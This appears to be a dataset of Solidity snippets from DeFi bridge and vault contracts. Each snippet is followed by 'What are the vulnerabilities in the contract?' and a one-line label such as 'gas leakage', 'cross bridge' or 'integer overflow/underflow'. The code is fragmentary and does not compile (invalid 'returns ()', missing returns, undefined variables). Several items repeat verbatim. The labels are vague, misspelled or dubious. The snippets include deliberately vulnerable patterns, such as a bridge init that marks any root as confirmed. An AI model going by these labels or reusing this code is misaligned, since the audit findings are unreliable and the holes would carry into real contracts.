127                     _anyswapData.toChainId
128                 );
129             } else {
130                 // Give Anyswap approval to bridge tokens
131                 LibAsset.approveERC20(IERC20(_anyswapData.token), _anyswapData.router, _anyswapData.amount);

132                 IAnyswapRouter(_anyswapData.router).anySwapOut(
133                     _anyswapData.token,
134                     _anyswapData.recipient,
135                     _anyswapData.amount,
136                     _anyswapData.toChainId
137                 );
138             }
139         }
140     }
141 }
What are the vulnerabilities in the contract?
ID uniquness violation
<end of text>
1 abstract contract BaseVault {

2     DepositQueueLib DepositQueue;

3     function processQueuedDeposits(uint256 startIndex, uint256 endIndex) external {
4         uint256 _totalAssets = totalAssets();
5         for (uint256 i = startIndex; i < endIndex; i++){
6             uint256 currentAssets = _totalAssets + processedDeposits;
7             depositEntry = depositQueue.get(i);
8             processedDeposits += depositEntry.amount;
9         }
10         depositQueue.remove(startIndex, endIndex);
11     }
What are the vulnerabilities in the contract?
gas leakage
<end of text>
1 abstract contract BaseVault {

2     DepositQueueLib DepositQueue;

3     function processQueuedDeposits(uint256 startIndex, uint256 endIndex) external {
4         uint256 _totalAssets = totalAssets();
5         for (uint256 i = startIndex; i < endIndex; i++){
6             uint256 currentAssets = _totalAssets + processedDeposits;
7             depositEntry = depositQueue.get(i);
8             processedDeposits += depositEntry.amount;
9         }
10         depositQueue.remove(startIndex, endIndex);
11     }
What are the vulnerabilities in the contract?
gas leakage
<end of text>
1 contract Bridge {
2   function init(
3     uint32 _callSite,
4     address _sender,
5     bytes32 _merkleRoot
6      ) public {
7         base_initialize(_sender);
8         callSite = _callSite;
9         committedRoot = _merkleRoot;
10         confirmAt[_merkleRoot] = 1;
11      }


12  function process(bytes memory _message) 
13     public returns (bool _success) {
14     assert(accept(messages[_msgHash]));
15     }
    
16   function accept(bytes32 _root) 
17     public view returns (bool) {
18     uint256 _time = confirmAt[_root];
19      }
What are the vulnerabilities in the contract?
cross bridge
ID Uniqueness violation
<end of text>
1 contract Bridge {
2   function init(
3     uint32 _callSite,
4     address _sender,
5     bytes32 _merkleRoot
6      ) public {
7         base_initialize(_sender);
8         callSite = _callSite;
9         committedRoot = _merkleRoot;
10         confirmAt[_merkleRoot] = 1;
11      }


12  function process(bytes memory _message) 
13     public returns (bool _success) {
14     assert(accept(messages[_msgHash]));
15     }
    
16   function accept(bytes32 _root) 
17     public view returns (bool) {
18     uint256 _time = confirmAt[_root];
19      }
What are the vulnerabilities in the contract?
cross bridge
ID Uniqueness violation
<end of text>
1     function _stETHTransferFrom(address from, address to, uint256 amount) internal returns () {      
2         _asset.safeTransferFrom(from, to, amount);
3       }
4     }

5     function _beforeWithdraw(uint256 shares) internal {
6         lastRoundAssets -= shares.mulDivDown(lastSharePrice);
      
7     }
What are the vulnerabilities in the contract?
integer overflow/underflow
<end of text>
1     function _stETHTransferFrom(address from, address to, uint256 amount) internal returns () {      
2         _asset.safeTransferFrom(from, to, amount);
3       }
4     }

5     function _beforeWithdraw(uint256 shares) internal {
6         lastRoundAssets -= shares.mulDivDown(lastSharePrice);
      
7     }
What are the vulnerabilities in the contract?
integer overflow/underflow
<end of text>